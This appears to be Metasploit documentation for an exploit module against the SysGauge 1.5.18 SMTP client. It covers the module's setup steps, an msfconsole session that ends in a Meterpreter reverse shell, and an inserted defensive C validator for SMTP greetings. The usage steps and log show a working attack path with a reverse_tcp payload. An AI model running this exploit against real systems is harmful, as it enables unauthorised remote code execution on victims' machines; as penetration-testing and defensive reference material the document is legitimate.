GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md

Vulnerable Application

This module will set up an SMTP server and wait for a connection from SysGauge 1.5.18, made through its SMTP server validation feature. The module sends a malicious response in the 220 service ready reply, exploiting the client and resulting in an unprivileged shell.

The software is available for download from SysGauge.
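
For client developers, the defensive counterpart to the behaviour described above is to treat the 220 greeting as untrusted input. The following is an added example, not code from the module or from SysGauge; it assumes the general case of a client copying the greeting into a fixed-size buffer, and the names check_greeting, greet_status and SMTP_REPLY_MAX are hypothetical. It enforces the RFC 5321 limit of 512 octets per reply line before anything is copied.

```c
#include <stdio.h>
#include <string.h>

#define SMTP_REPLY_MAX 512 /* RFC 5321 4.5.3.1.5: reply line incl. CRLF */

enum greet_status { GREET_OK, GREET_TOO_LONG, GREET_INCOMPLETE,
                    GREET_BAD_CODE, GREET_BAD_BYTE };

/* Validate one greeting line in buf[0..len) and copy its text (after
 * "220 " or "220-") into out[outcap]. out is written only on GREET_OK. */
enum greet_status check_greeting(const unsigned char *buf, size_t len,
                                 char *out, size_t outcap)
{
    size_t limit = len < SMTP_REPLY_MAX ? len : SMTP_REPLY_MAX;
    size_t eol = 0;
    /* Look for CRLF inside the permitted window only. */
    while (eol + 1 < limit && !(buf[eol] == '\r' && buf[eol + 1] == '\n'))
        eol++;
    if (eol + 1 >= limit)
        return len >= SMTP_REPLY_MAX ? GREET_TOO_LONG : GREET_INCOMPLETE;

    /* Reply code must be "220" followed by a space or hyphen. */
    if (eol < 4 || memcmp(buf, "220", 3) != 0 ||
        (buf[3] != ' ' && buf[3] != '-'))
        return GREET_BAD_CODE;

    /* Text must be printable ASCII or tab: no NULs, no binary. */
    for (size_t i = 4; i < eol; i++)
        if ((buf[i] < 0x20 && buf[i] != '\t') || buf[i] > 0x7e)
            return GREET_BAD_BYTE;

    size_t textlen = eol - 4;
    if (textlen >= outcap) /* also covers outcap == 0; keeps room for NUL */
        return GREET_TOO_LONG;
    memcpy(out, buf + 4, textlen);
    out[textlen] = '\0';
    return GREET_OK;
}

int main(void)
{
    /* Constructed sample: a 2048-byte line starting "220 " with no CRLF. */
    static unsigned char big[2048];
    char text[128];
    memset(big, 'A', sizeof big);
    memcpy(big, "220 ", 4);
    printf("status=%d\n", check_greeting(big, sizeof big, text, sizeof text));
    return 0;
}
```

A caller that receives GREET_INCOMPLETE reads more bytes and calls again; any other non-OK status means the connection should be dropped without further parsing.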

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/smtp/sysgauge_client_bof

  4. Do: set payload windows/meterpreter/reverse_tcp

  5. Do: set LHOST ip

  6. Do: run

  7. The user should put your SRVHOST or other applicable IP address in the SMTP configuration in the program, and hit the "Verify Email ..." button.

  8. You should get a shell.

Scenarios

Here is how to typically execute the module. Note that the client must input this SMTP server information under SysGauge Options and hit the "Verify Email ..." button.

    msf > use exploit/windows/smtp/sysgauge_client_bof
    msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
    lhost => 10.0.0.1
    msf exploit(sysgauge_client_bof) > exploit
    [*] Exploit running as background job.
    msf exploit(sysgauge_client_bof) >
    [*] Started reverse TCP handler on 10.0.0.1:4444
    [*] Server started.
    [*] Client connected: 10.0.0.128
    [*] Sending payload...
    [*] Sending stage (957487 bytes) to 10.0.0.128
    [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500